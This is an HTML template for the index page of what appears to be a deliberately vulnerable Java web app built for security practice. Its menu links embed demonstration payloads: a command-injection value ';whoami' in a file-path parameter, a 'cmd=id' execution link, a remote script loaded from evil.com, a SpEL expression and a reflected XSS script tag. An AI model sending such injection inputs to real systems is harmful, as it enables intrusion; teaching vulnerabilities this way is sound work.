<!DOCTYPE html>
<!-- 所有html都需要引入Thymeleaf命名空间 -->
<html xmlns:th="http://www.thymeleaf.org">
<head>
    <meta charset="UTF-8"/>
    <title>Java Sec</title>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
    <link rel="stylesheet" th:href="@{/css/base.css}">
</head>

<body>

<nav class="navbar navbar-inverse">
    <div id="navigation" style="margin-left: 1px;">
        <div class="navbar-header">
            <a class="navbar-brand" href="#">Java Sec</a>
        </div>
    </div>

    <div id="navbar" class="navbar-collapse collapse">
        <ul class="nav navbar-nav navbar-right">
            <li><a th:href="@{/admin}">Login</a></li>
        </ul>
        <form class="navbar-form navbar-right">
            <input type="text" class="form-control" placeholder="Search...">
        </form>
    </div>
</nav>

<div class="container-fluid">
    <div class="row">
        <div class="col-md-2">
            <!-- 垂直菜单 -->

            <ul id="main-nav" class="nav nav-tabs nav-stacked">
                <li class="active">
                    <a href="#"><i class="glyphicon glyphicon-th-large"></i> 漏洞类型</a>
                </li>

                <!-- RCE -->
                <li>
                    <a href="#rce" class="nav-header collapsed" data-toggle="collapse">
                        <i class="glyphicon glyphicon-cog"></i> 远程代码执行<span
                            class="pull-right glyphicon glyphicon-chevron-down"></span>
                    </a>
                    <ul id="rce" class="nav nav-list collapse secondmenu">
                        <li><a th:href="@{/RCE/ProcessBuilder?filepath=/tmp;whoami}"><i
                                class="glyphicon glyphicon-th-list"></i> ProcessBuilder</a></li>
                        <li><a th:href="@{/RCE/runtime?cmd=id}"><i class="glyphicon glyphicon-th-list"></i> Runtime</a>
                        </li>
                        <li><a th:href="@{/RCE/js?url=http://evil.com/java/1.js}"><i
                                class="glyphicon glyphicon-th-list"></i> Load JS</a></li>
                    </ul>
                </li>

                <!-- SpEL表达式注入 -->
                <li>
                    <a th:href="@{/spel?ex=100-1}"><i class="glyphicon glyphicon-credit-card"></i> SpEL表达式注入</a>
                </li>

                <li>
                    <a th:href="@{/GetIP/xxf}"><i class="glyphicon glyphicon-globe"></i> IP欺骗</a>
                </li>
                <li>
                    <a th:href="@{/XSS/reflect?content=aaa<script>alert(1)</script>}"><i
                            class="glyphicon glyphicon-calendar"></i> XSS</a>
                </li>
                <li>
                    <a th:href="@{/sysinfo}"><i class="glyphicon glyphicon-fire"></i> 系统信息</a>
                </li>
            </ul>
        </div>
    </div>
</div>




<script src="https://code.jquery.com/jquery-1.12.4.min.js"
        integrity="sha384-nvAa0+6Qg9clwYCGGPpDQLVpLNn0fRaROjHqs13t4Ggj3Ez50XnGQqc/r8MhnRDZ"
        crossorigin="anonymous"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"
        integrity="sha384-aJ21OjlMXNL5UyIl/XNwTMqvzeRMZH2w8c5cRVpzpU8Y5bApTppSuUkhZXN0VxHd"
        crossorigin="anonymous"></script>
</body>
</html>